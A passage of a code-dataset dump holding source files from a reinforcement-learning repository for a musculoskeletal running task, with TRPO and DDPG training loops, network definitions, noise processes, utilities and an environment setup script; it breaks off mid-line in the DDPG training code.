"text": "import numpy as np\n\n\nclass RandomProcess(object):\n def reset_states(self):\n pass\n\n\nclass AnnealedGaussianProcess(RandomProcess):\n def __init__(self, mu, sigma, sigma_min, n_steps_annealing=int(1e5)):\n self.mu = mu\n self.sigma = sigma\n self.n_steps = 0\n\n if sigma_min is not None:\n self.m = -float(sigma - sigma_min) / float(n_steps_annealing)\n self.c = sigma\n self.sigma_min = sigma_min\n else:\n self.m = 0.\n self.c = sigma\n self.sigma_min = sigma\n\n @property\n def current_sigma(self):\n sigma = max(self.sigma_min, self.m * float(self.n_steps) + self.c)\n return sigma\n\n\nclass OrnsteinUhlenbeckProcess(AnnealedGaussianProcess):\n def __init__(self, theta, mu=0., sigma=1., dt=1e-2,\n x0=None, size=1, sigma_min=None, n_steps_annealing=int(1e5)):\n super(OrnsteinUhlenbeckProcess, self).__init__(\n mu=mu, sigma=sigma, sigma_min=sigma_min, n_steps_annealing=n_steps_annealing)\n self.theta = theta\n self.mu = mu\n self.dt = dt\n self.x0 = x0\n self.size = size\n self.reset_states()\n\n def sample(self):\n x = self.x_prev + self.theta * (self.mu - self.x_prev) * self.dt + \\\n self.current_sigma * np.sqrt(self.dt) * np.random.normal(size=self.size)\n self.x_prev = x\n self.n_steps += 1\n return x\n\n def reset_states(self):\n self.x_prev = self.x0 if self.x0 is not None else np.zeros(self.size)\n\n\ndef create_random_process(args):\n if args.rp_type == \"ornstein-uhlenbeck\":\n return OrnsteinUhlenbeckProcess(\n size=args.n_action,\n theta=args.rp_theta,\n mu=args.rp_mu,\n sigma=args.rp_sigma,\n sigma_min=args.rp_sigma_min)\n else:\n raise NotImplementedError()\n"
},
{
"alpha_fraction": 0.576606273651123,
"alphanum_fraction": 0.5835049152374268,
"avg_line_length": 38.967079162597656,
"blob_id": "1f0bacffc7413bbe04c8ab5bb5c77580266638f8",
"content_id": "bf3d465286a5a81a189efece4b3a4050515aa9a2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9712,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 243,
"path": "/baselines/trpo.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\nimport numpy as np\nimport time\nfrom mpi4py import MPI\nfrom collections import deque\nfrom contextlib import contextmanager\n\nfrom common.logger import Logger\n\nfrom baselines.baselines_common import explained_variance, zipsame, dataset\nimport baselines.baselines_common.tf_util as U\nfrom baselines.baselines_common import colorize\nfrom baselines.baselines_common.mpi_adam import MpiAdam\nfrom baselines.baselines_common.mpi_saver import MpiSaver\nfrom baselines.baselines_common.cg import cg\n\nfrom baselines.trajectories import traj_segment_generator, add_vtarg_and_adv\n\n\ndef learn(env, policy_func, args, *,\n timesteps_per_batch, # what to train on\n max_kl, cg_iters,\n gamma, lam, # advantage estimation\n entcoeff=0.0,\n cg_damping=1e-2,\n vf_stepsize=3e-4,\n vf_iters=3):\n nworkers = MPI.COMM_WORLD.Get_size()\n rank = MPI.COMM_WORLD.Get_rank()\n np.set_printoptions(precision=3)\n # Setup losses and stuff\n # ----------------------------------------\n ob_space = env.observation_space\n ac_space = env.action_space\n pi = policy_func(\"pi\", ob_space, ac_space)\n oldpi = policy_func(\"oldpi\", ob_space, ac_space)\n atarg = tf.placeholder(\n dtype=tf.float32, shape=[None]) # Target advantage function (if applicable)\n ret = tf.placeholder(dtype=tf.float32, shape=[None]) # Empirical return\n\n ob = U.get_placeholder_cached(name=\"ob\")\n ac = pi.pdtype.sample_placeholder([None])\n\n kloldnew = oldpi.pd.kl(pi.pd)\n ent = pi.pd.entropy()\n meankl = U.mean(kloldnew)\n meanent = U.mean(ent)\n entbonus = entcoeff * meanent\n\n vferr = U.mean(tf.square(pi.vpred - ret))\n\n ratio = tf.exp(pi.pd.logp(ac) - oldpi.pd.logp(ac)) # advantage * pnew / pold\n surrgain = U.mean(ratio * atarg)\n\n optimgain = surrgain + entbonus\n losses = [optimgain, meankl, entbonus, surrgain, meanent]\n loss_names = [\"optimgain\", \"meankl\", \"entloss\", \"surrgain\", \"entropy\"]\n\n dist = meankl\n\n all_var_list = pi.get_trainable_variables()\n var_list = [v for v in all_var_list if v.name.split(\"/\")[1].startswith(\"pol\")]\n vf_var_list = [v for v in all_var_list if v.name.split(\"/\")[1].startswith(\"vf\")]\n vfadam = MpiAdam(vf_var_list)\n\n policy_var_list = [v for v in all_var_list if v.name.split(\"/\")[0].startswith(\"pi\")]\n saver = MpiSaver(policy_var_list, log_prefix=args.logdir)\n\n get_flat = U.GetFlat(var_list)\n set_from_flat = U.SetFromFlat(var_list)\n klgrads = tf.gradients(dist, var_list)\n flat_tangent = tf.placeholder(dtype=tf.float32, shape=[None], name=\"flat_tan\")\n shapes = [var.get_shape().as_list() for var in var_list]\n start = 0\n tangents = []\n for shape in shapes:\n sz = U.intprod(shape)\n tangents.append(tf.reshape(flat_tangent[start:start + sz], shape))\n start += sz\n gvp = tf.add_n([U.sum(g * tangent) for (g, tangent) in\n zipsame(klgrads, tangents)]) # pylint: disable=E1111\n fvp = U.flatgrad(gvp, var_list)\n\n assign_old_eq_new = U.function(\n [], [],\n updates=[tf.assign(oldv, newv)\n for (oldv, newv) in\n zipsame(oldpi.get_variables(), pi.get_variables())])\n compute_losses = U.function([ob, ac, atarg], losses)\n compute_lossandgrad = U.function([ob, ac, atarg], losses + [U.flatgrad(optimgain, var_list)])\n compute_fvp = U.function([flat_tangent, ob, ac, atarg], fvp)\n compute_vflossandgrad = U.function([ob, ret], U.flatgrad(vferr, vf_var_list))\n\n @contextmanager\n def timed(msg):\n if rank == 0:\n print(colorize(msg, color='magenta'))\n tstart = time.time()\n yield\n print(colorize(\"done in %.3f seconds\" % (time.time() - tstart), color='magenta'))\n else:\n yield\n\n def allmean(x):\n assert isinstance(x, np.ndarray)\n out = np.empty_like(x)\n MPI.COMM_WORLD.Allreduce(x, out, op=MPI.SUM)\n out /= nworkers\n return out\n\n U.initialize()\n saver.restore(restore_from=args.restore_actor_from)\n th_init = get_flat()\n MPI.COMM_WORLD.Bcast(th_init, root=0)\n set_from_flat(th_init)\n vfadam.sync()\n print(\"Init param sum\", th_init.sum(), flush=True)\n\n # Prepare for rollouts\n # ----------------------------------------\n seg_gen = traj_segment_generator(pi, env, args, timesteps_per_batch, stochastic=True)\n\n episodes_so_far = 0\n timesteps_so_far = 0\n iters_so_far = 0\n tstart = time.time()\n lenbuffer = deque(maxlen=40) # rolling buffer for episode lengths\n rewbuffer = deque(maxlen=40) # rolling buffer for episode rewards\n\n args.logdir = \"{}/thread_{}\".format(args.logdir, args.thread)\n logger = Logger(args.logdir)\n\n while time.time() - tstart < 86400 * args.max_train_days:\n # logger.log(\"********** Iteration %i ************\" % iters_so_far)\n meanlosses = [0] * len(loss_names)\n with timed(\"sampling\"):\n seg = seg_gen.__next__()\n add_vtarg_and_adv(seg, gamma, lam)\n\n # ob, ac, atarg, ret, td1ret = map(np.concatenate, (obs, acs, atargs, rets, td1rets))\n ob, ac, atarg, tdlamret = seg[\"ob\"], seg[\"ac\"], seg[\"adv\"], seg[\"tdlamret\"]\n vpredbefore = seg[\"vpred\"] # predicted value function before udpate\n atarg = (atarg - atarg.mean()) / atarg.std() # standardized advantage function estimate\n\n if hasattr(pi, \"ret_rms\"): pi.ret_rms.update(tdlamret)\n if hasattr(pi, \"ob_rms\"): pi.ob_rms.update(ob) # update running mean/std for policy\n\n segargs = seg[\"ob\"], seg[\"ac\"], seg[\"adv\"]\n fvpargs = [arr[::5] for arr in segargs]\n\n def fisher_vector_product(p):\n return allmean(compute_fvp(p, *fvpargs)) + cg_damping * p\n\n assign_old_eq_new() # set old parameter values to new parameter values\n with timed(\"computegrad\"):\n *lossbefore, g = compute_lossandgrad(*segargs)\n lossbefore = allmean(np.array(lossbefore))\n g = allmean(g)\n if np.allclose(g, 0):\n pass\n # logger.log(\"Got zero gradient. not updating\")\n else:\n with timed(\"cg\"):\n stepdir = cg(fisher_vector_product, g, cg_iters=cg_iters, verbose=rank == 0)\n assert np.isfinite(stepdir).all()\n shs = .5 * stepdir.dot(fisher_vector_product(stepdir))\n lm = np.sqrt(shs / max_kl)\n # logger.log(\"lagrange multiplier:\", lm, \"gnorm:\", np.linalg.norm(g))\n fullstep = stepdir / lm\n expectedimprove = g.dot(fullstep)\n surrbefore = lossbefore[0]\n stepsize = 1.0\n thbefore = get_flat()\n for _ in range(10):\n thnew = thbefore + fullstep * stepsize\n set_from_flat(thnew)\n meanlosses = surr, kl, *_ = allmean(np.array(compute_losses(*segargs)))\n improve = surr - surrbefore\n # logger.log(\"Expected: %.3f Actual: %.3f\" % (expectedimprove, improve))\n # if not np.isfinite(meanlosses).all():\n # logger.log(\"Got non-finite value of losses -- bad!\")\n # elif kl > max_kl * 1.5:\n # logger.log(\"violated KL constraint. shrinking step.\")\n # elif improve < 0:\n # logger.log(\"surrogate didn't improve. shrinking step.\")\n # else:\n # logger.log(\"Stepsize OK!\")\n # break\n stepsize *= .5\n else:\n # logger.log(\"couldn't compute a good step\")\n set_from_flat(thbefore)\n if nworkers > 1 and iters_so_far % 20 == 0:\n paramsums = MPI.COMM_WORLD.allgather(\n (thnew.sum(), vfadam.getflat().sum())) # list of tuples\n assert all(np.allclose(ps, paramsums[0]) for ps in paramsums[1:])\n\n with timed(\"vf\"):\n for _ in range(vf_iters):\n for (mbob, mbret) in dataset.iterbatches((seg[\"ob\"], seg[\"tdlamret\"]),\n include_final_partial_batch=False,\n batch_size=64):\n g = allmean(compute_vflossandgrad(mbob, mbret))\n vfadam.update(g, vf_stepsize)\n\n saver.sync()\n\n lrlocal = (seg[\"ep_lens\"], seg[\"ep_rets\"]) # local values\n listoflrpairs = MPI.COMM_WORLD.allgather(lrlocal) # list of tuples\n lens, rews = map(flatten_lists, zip(*listoflrpairs))\n lenbuffer.extend(lens)\n rewbuffer.extend(rews)\n\n episodes_so_far += len(lens)\n timesteps_so_far += sum(lens)\n iters_so_far += 1\n\n # Logging\n logger.scalar_summary(\"episodes\", len(lens), iters_so_far)\n\n for (lossname, lossval) in zip(loss_names, meanlosses):\n logger.scalar_summary(lossname, lossval, episodes_so_far)\n\n logger.scalar_summary(\"ev_tdlam_before\", explained_variance(vpredbefore, tdlamret), episodes_so_far)\n\n logger.scalar_summary(\"step\", np.mean(lenbuffer), episodes_so_far)\n logger.scalar_summary(\"reward\", np.mean(rewbuffer), episodes_so_far)\n logger.scalar_summary(\"best reward\", np.max(rewbuffer), episodes_so_far)\n\n elapsed_time = time.time() - tstart\n\n logger.scalar_summary(\n \"episode per minute\",\n episodes_so_far / elapsed_time * 60,\n episodes_so_far)\n logger.scalar_summary(\n \"step per second\",\n timesteps_so_far / elapsed_time,\n episodes_so_far)\n\n\ndef flatten_lists(listoflists):\n return [el for list_ in listoflists for el in list_]\n"
},
{
"alpha_fraction": 0.5174506902694702,
"alphanum_fraction": 0.5349013805389404,
"avg_line_length": 30.380952835083008,
"blob_id": "e11b5b4d67e574f81964dac1e5c7d58363d700c6",
"content_id": "ab619c93cc6f68cdb4aef8d1154b6503aa948d6b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1318,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 42,
"path": "/common/nets.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "from collections import OrderedDict\nfrom itertools import tee\n\nimport torch\nimport torch.nn as nn\n\nfrom common.modules.LayerNorm import LayerNorm\n\n\ndef pairwise(iterable):\n \"s -> (s0,s1), (s1,s2), (s2, s3), ...\"\n a, b = tee(iterable)\n next(b, None)\n return zip(a, b)\n\n\nclass LinearNet(nn.Module):\n def __init__(self, layers, activation=torch.nn.ELU,\n layer_norm=False, linear_layer=nn.Linear):\n super(LinearNet, self).__init__()\n self.input_shape = layers[0]\n self.output_shape = layers[-1]\n\n if layer_norm:\n layer_fn = lambda layer: [\n (\"linear_{}\".format(layer[0]), linear_layer(layer[1][0], layer[1][1])),\n (\"layer_norm_{}\".format(layer[0]), LayerNorm(layer[1][1])),\n (\"act_{}\".format(layer[0]), activation())]\n else:\n layer_fn = lambda layer: [\n (\"linear_{}\".format(layer[0]), linear_layer(layer[1][0], layer[1][1])),\n (\"act_{}\".format(layer[0]), activation())]\n\n self.net = torch.nn.Sequential(\n OrderedDict([\n x for y in map(\n lambda layer: layer_fn(layer),\n enumerate(pairwise(layers))) for x in y]))\n\n def forward(self, x):\n x = self.net.forward(x)\n return x\n"
},
{
"alpha_fraction": 0.5784666538238525,
"alphanum_fraction": 0.5881538987159729,
"avg_line_length": 37.031578063964844,
"blob_id": "4d280e3d4217bb097c7105362cc9dbb38bbac223",
"content_id": "bf39868f06ab74ef9c5e588bf832137d7041c8d7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3613,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 95,
"path": "/baselines/nets.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\nimport baselines.baselines_common.tf_util as U\nfrom baselines.baselines_common.mpi_running_mean_std import RunningMeanStd\nfrom baselines.baselines_common.distributions import make_pdtype, DiagGaussianPdType, BernoulliPdType\n\n\ndef mlp_block(x, name, num_hid_layers, hid_size, activation_fn=tf.nn.tanh):\n with tf.variable_scope(name_or_scope=name):\n for i in range(num_hid_layers):\n x = U.dense(\n x, hid_size,\n name=\"fc%i\" % (i + 1), weight_init=U.normc_initializer(1.0))\n x = activation_fn(x)\n return x\n\n\ndef feature_net(x, name, num_hid_layers, hid_size, activation_fn=tf.nn.tanh):\n with tf.variable_scope(name_or_scope=name):\n x = mlp_block(\n x, name=\"mlp\",\n hid_size=hid_size, num_hid_layers=num_hid_layers, activation_fn=activation_fn)\n return x\n\n\nclass Actor(object):\n def __init__(self, name, *args, **kwargs):\n with tf.variable_scope(name):\n self._init(*args, **kwargs)\n self.scope = tf.get_variable_scope().name\n\n def _init(self, ob_space, ac_space, hid_size, num_hid_layers, gaussian_fixed_var=True, noise_type=None):\n if noise_type == \"gaussian\":\n self.pdtype = pdtype = DiagGaussianPdType(ac_space.shape[0])\n else:\n self.pdtype = pdtype = make_pdtype(ac_space)\n\n ob = U.get_placeholder(\n name=\"ob\", dtype=tf.float32,\n shape=[None] + list(ob_space.shape))\n\n with tf.variable_scope(\"obfilter\"):\n self.ob_rms = RunningMeanStd(shape=ob_space.shape)\n obz = (ob - self.ob_rms.mean) / self.ob_rms.std\n obz = tf.clip_by_value(obz, -5.0, 5.0)\n\n # critic net (value network)\n last_out = feature_net(\n obz, name=\"vf\",\n num_hid_layers=num_hid_layers, hid_size=hid_size,\n activation_fn=tf.nn.tanh)\n self.vpred = U.dense(\n last_out, 1,\n name=\"vf_final\", weight_init=U.normc_initializer(1.0))[:, 0]\n\n # actor net (policy network)\n last_out = feature_net(\n obz, name=\"pol\",\n num_hid_layers=num_hid_layers, hid_size=hid_size,\n activation_fn=tf.nn.tanh)\n\n if gaussian_fixed_var and isinstance(self.pdtype, DiagGaussianPdType):\n mean = U.dense(\n last_out, pdtype.param_shape()[0] // 2,\n name=\"pol_final\", weight_init=U.normc_initializer(0.01))\n logstd = tf.get_variable(\n name=\"logstd\", shape=[1, pdtype.param_shape()[0] // 2],\n initializer=tf.zeros_initializer())\n pdparam = U.concatenate([mean, mean * 0.0 + logstd], axis=1)\n else:\n pdparam = U.dense(\n last_out, pdtype.param_shape()[0],\n name=\"pol_final\", weight_init=U.normc_initializer(0.01))\n\n # pd - probability distribution\n self.pd = pdtype.pdfromflat(pdparam)\n\n self.state_in = []\n self.state_out = []\n\n stochastic = tf.placeholder(dtype=tf.bool, shape=())\n ac = U.switch(stochastic, self.pd.sample(), self.pd.mode())\n self._act = U.function([stochastic, ob], [ac, self.vpred])\n\n def act(self, stochastic, ob):\n ac1, vpred1 = self._act(stochastic, ob[None])\n return ac1[0], vpred1[0]\n\n def get_variables(self):\n return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self.scope)\n\n def get_trainable_variables(self):\n return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self.scope)\n\n def get_initial_state(self):\n return []\n"
},
{
"alpha_fraction": 0.5714285969734192,
"alphanum_fraction": 0.571860134601593,
"avg_line_length": 25.340909957885742,
"blob_id": "a8d2da6bec9c24519ae021eee038debda0129a5d",
"content_id": "ff4cf6ef09e6f930f61bec3e82331d1268578818",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2317,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 88,
"path": "/common/misc_util.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport random\nimport numpy as np\n\n\ndef create_if_need(path):\n if not os.path.exists(path):\n os.makedirs(path)\n\n\ndef boolean_flag(parser, name, default=False, help=None):\n \"\"\"Add a boolean flag to argparse parser.\n\n Parameters\n ----------\n parser: argparse.Parser\n parser to add the flag to\n name: str\n --<name> will enable the flag, while --no-<name> will disable it\n default: bool or None\n default value of the flag\n help: str\n help string for the flag\n \"\"\"\n dest = name.replace('-', '_')\n parser.add_argument(\"--\" + name, action=\"store_true\", default=default, dest=dest, help=help)\n parser.add_argument(\"--no-\" + name, action=\"store_false\", dest=dest)\n\n\ndef str2params(string, delimeter=\"-\"):\n try:\n result = list(map(int, string.split(delimeter)))\n except:\n result = None\n return result\n\n\ndef set_global_seeds(i):\n try:\n import torch\n except ImportError:\n pass\n else:\n torch.manual_seed(i)\n try:\n import tensorflow as tf\n except ImportError:\n pass\n else:\n tf.set_random_seed(i)\n np.random.seed(i)\n random.seed(i)\n\n\ndef query_yes_no(question, default=\"no\"):\n \"\"\"Ask a yes/no question via input() and return their answer.\n\n \"question\" is a string that is presented to the user.\n \"default\" is the presumed answer if the user just hits <Enter>.\n It must be \"yes\" (the default), \"no\" or None (meaning\n an answer is required of the user).\n\n The \"answer\" return value is True for \"yes\" or False for \"no\".\n \"\"\"\n valid = {\n \"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False\n }\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")"
},
{
"alpha_fraction": 0.8388625383377075,
"alphanum_fraction": 0.8388625383377075,
"avg_line_length": 51.75,
"blob_id": "fa94bca5ad274f684acec13b35f7b0195eafa9bc",
"content_id": "a07d7dfc6af1a4630b4545bea05caab41974cdd4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 211,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 4,
"path": "/baselines/baselines_common/__init__.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "from baselines.baselines_common.console_util import *\nfrom baselines.baselines_common.dataset import Dataset\nfrom baselines.baselines_common.math_util import *\nfrom baselines.baselines_common.misc_util import *\n"
},
{
"alpha_fraction": 0.6904761791229248,
"alphanum_fraction": 0.704081654548645,
"avg_line_length": 41.14285659790039,
"blob_id": "01702e2e038e1c03b1718c3e3413bc370f322fbd",
"content_id": "f3070d069eca1db0217d61cbaa51f7a468b59c45",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 294,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 7,
"path": "/setup_env_mpi.sh",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\nconda upgrade pip -y && \\\n\tconda install -c conda-forge lapack git -y && \\\n\tconda install ipython libgcc -y && \\\n\tconda install pytorch torchvision -c soumith -y && \\\n\tpip install tensorflow==1.3.0 gym mpi4py && \\\n\tpip install git+https://github.com/stanfordnmbl/osim-rl.git"
},
{
"alpha_fraction": 0.5508595705032349,
"alphanum_fraction": 0.560171902179718,
"avg_line_length": 35.73684310913086,
"blob_id": "90c36f5fe08f072ee8869930a1868f916d52de66",
"content_id": "47482b065123f843cb0dcb983bcf1b94655242e3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2792,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 76,
"path": "/baselines/trajectories.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\ndef traj_segment_generator(pi, env, args, horizon, stochastic):\n # Initialize state variables\n t = 0\n ac = env.action_space.sample() # not used, just so we have the datatype\n new = True # marks if we're on first timestep of an episode\n ob = env.reset(difficulty=args.difficulty)\n\n cur_ep_ret = 0 # return in current episode\n cur_ep_len = 0 # len of current episode\n ep_rets = [] # returns of completed episodes in this segment\n ep_lens = [] # lengths of ...\n\n # Initialize history arrays\n obs = np.array([ob for _ in range(horizon)])\n rews = np.zeros(horizon, 'float32')\n vpreds = np.zeros(horizon, 'float32')\n news = np.zeros(horizon, 'int32')\n acs = np.array([ac for _ in range(horizon)])\n prevacs = acs.copy()\n\n while True:\n prevac = ac\n ac, vpred = pi.act(stochastic, ob)\n # Slight weirdness here because we need value function at time T\n # before returning segment [0, T-1] so we get the correct\n # terminal value\n if t > 0 and t % horizon == 0:\n yield {\"ob\": obs, \"rew\": rews, \"vpred\": vpreds, \"new\": news,\n \"ac\": acs, \"prevac\": prevacs, \"nextvpred\": vpred * (1 - new),\n \"ep_rets\": ep_rets, \"ep_lens\": ep_lens}\n # @TODO: TRPO & PPO implementation diff\n # _, vpred = pi.act(stochastic, ob) # @TODO: uncomment??? IMPORTANT!!\n # Be careful!!! if you change the downstream algorithm to aggregate\n # several of these batches, then be sure to do a deepcopy\n ep_rets = []\n ep_lens = []\n i = t % horizon\n obs[i] = ob\n vpreds[i] = vpred\n news[i] = new\n acs[i] = ac\n prevacs[i] = prevac\n\n ob, rew, new, _ = env.step(ac)\n rews[i] = rew\n\n cur_ep_ret += rew\n cur_ep_len += 1\n if new:\n ep_rets.append(cur_ep_ret)\n ep_lens.append(cur_ep_len)\n cur_ep_ret = 0\n cur_ep_len = 0\n ob = env.reset(difficulty=args.difficulty)\n t += 1\n\n\ndef add_vtarg_and_adv(seg, gamma, lam):\n \"\"\"\n Compute target value using TD(lambda) estimator, and advantage with GAE(lambda)\n \"\"\"\n # last element is only used for last vtarg, but we already zeroed it if last new = 1\n new = np.append(seg[\"new\"], 0)\n vpred = np.append(seg[\"vpred\"], seg[\"nextvpred\"])\n T = len(seg[\"rew\"])\n seg[\"adv\"] = gaelam = np.empty(T, 'float32')\n rew = seg[\"rew\"]\n lastgaelam = 0\n for t in reversed(range(T)):\n nonterminal = 1 - new[t + 1]\n delta = rew[t] + gamma * vpred[t + 1] * nonterminal - vpred[t]\n gaelam[t] = lastgaelam = delta + gamma * lam * nonterminal * lastgaelam\n seg[\"tdlamret\"] = seg[\"adv\"] + seg[\"vpred\"]\n"
},
{
"alpha_fraction": 0.5945460796356201,
"alphanum_fraction": 0.6010305881500244,
"avg_line_length": 35.20964431762695,
"blob_id": "b7503a2ad99fbac6d35b0afb356a98a85d08b251",
"content_id": "d23110dd58f9ed2dabea274ef1e961deb776ad07",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17272,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 477,
"path": "/ddpg/model.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import random\nimport numpy as np\nimport torch\nimport queue as py_queue\nimport time\nimport torch.nn as nn\nfrom pprint import pprint\n\nfrom ddpg.nets import Actor, Critic\nfrom common.torch_util import to_numpy, to_tensor, soft_update\nfrom common.misc_util import create_if_need, set_global_seeds\nfrom common.logger import Logger\nfrom common.buffers import create_buffer\nfrom common.loss import create_loss, create_decay_fn\nfrom common.env_wrappers import create_env\nfrom common.random_process import create_random_process\n\n\ndef create_model(args):\n actor = Actor(\n args.n_observation, args.n_action, args.actor_layers,\n activation=args.actor_activation,\n layer_norm=args.actor_layer_norm,\n parameters_noise=args.actor_parameters_noise,\n parameters_noise_factorised=args.actor_parameters_noise_factorised,\n last_activation=nn.Tanh)\n critic = Critic(\n args.n_observation, args.n_action, args.critic_layers,\n activation=args.critic_activation,\n layer_norm=args.critic_layer_norm,\n parameters_noise=args.critic_parameters_noise,\n parameters_noise_factorised=args.critic_parameters_noise_factorised)\n\n pprint(actor)\n pprint(critic)\n\n return actor, critic\n\n\ndef create_act_update_fns(actor, critic, target_actor, target_critic, args):\n actor_optim = torch.optim.Adam(actor.parameters(), lr=args.actor_lr)\n critic_optim = torch.optim.Adam(critic.parameters(), lr=args.critic_lr)\n\n criterion = create_loss(args)\n\n low_action_boundary = -1.\n high_action_boundary = 1.\n\n def act_fn(observation, noise=0):\n nonlocal actor\n action = to_numpy(actor(to_tensor(np.array([observation], dtype=np.float32)))).squeeze(0)\n action += noise\n action = np.clip(action, low_action_boundary, high_action_boundary)\n return action\n\n def update_fn(\n observations, actions, rewards, next_observations, dones, weights,\n actor_lr=1e-4, critic_lr=1e-3):\n nonlocal actor, critic, target_actor, target_critic, actor_optim, critic_optim\n\n if hasattr(args, \"flip_states\"):\n observations_flip = args.flip_states(observations)\n next_observations_flip = args.flip_states(next_observations)\n actions_flip = np.zeros_like(actions)\n actions_flip[:, :args.n_action // 2] = actions[:, args.n_action // 2:]\n actions_flip[:, args.n_action // 2:] = actions[:, :args.n_action // 2]\n\n observations = np.concatenate((observations, observations_flip))\n actions = np.concatenate((actions, actions_flip))\n rewards = np.tile(rewards.ravel(), 2)\n next_observations = np.concatenate((next_observations, next_observations_flip))\n dones = np.tile(dones.ravel(), 2)\n\n dones = dones[:, None].astype(np.bool)\n rewards = rewards[:, None].astype(np.float32)\n\n dones = to_tensor(np.invert(dones).astype(np.float32))\n rewards = to_tensor(rewards)\n weights = to_tensor(weights, requires_grad=False)\n\n next_v_values = target_critic(\n to_tensor(next_observations, volatile=True),\n target_actor(to_tensor(next_observations, volatile=True)),\n )\n next_v_values.volatile = False\n\n reward_predicted = dones * args.gamma * next_v_values\n td_target = rewards + reward_predicted\n\n # Critic update\n critic.zero_grad()\n\n v_values = critic(to_tensor(observations), to_tensor(actions))\n value_loss = criterion(v_values, td_target, weights=weights)\n value_loss.backward()\n\n torch.nn.utils.clip_grad_norm(critic.parameters(), args.grad_clip)\n for param_group in critic_optim.param_groups:\n param_group[\"lr\"] = critic_lr\n\n critic_optim.step()\n\n # Actor update\n actor.zero_grad()\n\n policy_loss = -critic(\n to_tensor(observations),\n actor(to_tensor(observations))\n )\n\n policy_loss = torch.mean(policy_loss * weights)\n policy_loss.backward()\n\n torch.nn.utils.clip_grad_norm(actor.parameters(), args.grad_clip)\n for param_group in actor_optim.param_groups:\n param_group[\"lr\"] = actor_lr\n\n actor_optim.step()\n\n # Target update\n soft_update(target_actor, actor, args.tau)\n soft_update(target_critic, critic, args.tau)\n\n metrics = {\n \"value_loss\": value_loss,\n \"policy_loss\": policy_loss\n }\n\n td_v_values = critic(\n to_tensor(observations, volatile=True, requires_grad=False),\n to_tensor(actions, volatile=True, requires_grad=False))\n td_error = td_target - td_v_values\n\n info = {\n \"td_error\": to_numpy(td_error)\n }\n\n return metrics, info\n\n def save_fn(episode=None):\n nonlocal actor, critic\n if episode is None:\n save_path = args.logdir\n else:\n save_path = \"{}/episode_{}\".format(args.logdir, episode)\n create_if_need(save_path)\n torch.save(actor.state_dict(), \"{}/actor_state_dict.pkl\".format(save_path))\n torch.save(critic.state_dict(), \"{}/critic_state_dict.pkl\".format(save_path))\n torch.save(target_actor.state_dict(), \"{}/target_actor_state_dict.pkl\".format(save_path))\n torch.save(target_critic.state_dict(), \"{}/target_critic_state_dict.pkl\".format(save_path))\n\n return act_fn, update_fn, save_fn\n\n\ndef train_multi_thread(actor, critic, target_actor, target_critic, args, prepare_fn, best_reward):\n workerseed = args.seed + 241 * args.thread\n set_global_seeds(workerseed)\n\n args.logdir = \"{}/thread_{}\".format(args.logdir, args.thread)\n create_if_need(args.logdir)\n\n act_fn, update_fn, save_fn = prepare_fn(actor, critic, target_actor, target_critic, args)\n logger = Logger(args.logdir)\n\n buffer = create_buffer(args)\n if args.prioritized_replay:\n beta_deacy_fn = create_decay_fn(\n \"linear\",\n initial_value=args.prioritized_replay_beta0,\n final_value=1.0,\n max_step=args.max_episodes)\n\n env = create_env(args)\n random_process = create_random_process(args)\n\n actor_learning_rate_decay_fn = create_decay_fn(\n \"linear\",\n initial_value=args.actor_lr,\n final_value=args.actor_lr_end,\n max_step=args.max_episodes)\n critic_learning_rate_decay_fn = create_decay_fn(\n \"linear\",\n initial_value=args.critic_lr,\n final_value=args.critic_lr_end,\n max_step=args.max_episodes)\n\n epsilon_cycle_len = random.randint(args.epsilon_cycle_len // 2, args.epsilon_cycle_len * 2)\n\n epsilon_decay_fn = create_decay_fn(\n \"cycle\",\n initial_value=args.initial_epsilon,\n final_value=args.final_epsilon,\n cycle_len=epsilon_cycle_len,\n num_cycles=args.max_episodes // epsilon_cycle_len)\n\n episode = 0\n step = 0\n start_time = time.time()\n while episode < args.max_episodes:\n if episode % 100 == 0:\n env = create_env(args)\n seed = 